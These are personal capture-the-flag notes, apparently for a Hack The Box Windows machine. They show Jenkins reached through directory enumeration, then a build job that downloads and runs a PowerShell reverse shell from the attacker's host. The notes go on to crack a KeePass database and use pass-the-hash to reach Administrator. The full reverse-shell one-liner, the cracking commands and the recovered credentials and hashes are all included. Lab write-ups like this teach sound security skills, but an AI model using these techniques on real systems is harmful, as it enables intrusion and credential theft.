2 :50000
===============================================================
2021/05/01 18:17:18 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]
http://10.10.10.63:50000/askjeeves/
shows a Jenkins dashboard
Created a new freestyle job with an "Execute Windows batch command" build step that pulls and runs a PowerShell reverse shell:
powershell iex (New-Object System.Net.WebClient).DownloadString('http://10.2.74.151:8888/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.2.74.151 -Port 6969
PS C:\Users\Administrator\.jenkins\workspace\revshell>whoami
jeeves\kohsuke
whoami /priv
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
systeminfo
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 5/2/2021, 2:23:20 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
[idk why but eh why not; this is the admin password on Jenkins]
C:\Users\Administrator\.jenkins\secrets> more initialAdminPassword
ccd3bc435b3c4f80bea8acca28aec491
Found a KeePass database, CEH.kdbx, under Documents; extract its hash with keepass2john and crack it offline:
$ keepass2john CEH.kdbx > ceh.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=KeePass ceh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:00:09 DONE (2021-05-01 19:32) 0.1051g/s 5780p/s 5780c/s 5780C/s nick18..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Found this under administrator (an LM:NT hash pair; the LM half aad3b435b51404eeaad3b435b51404ee is the empty/disabled LM hash, so the NT half is the usable part):
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
$ pth-winexe -U Administrator%'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00' //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
jeeves\administrator
dir /R lists alternate data streams (ADS), which a plain dir hides; root.txt is stored as a stream attached to hm.txt, so read that stream directly:
powershell Get-Content -Path "hm.txt" -Stream "root.txt"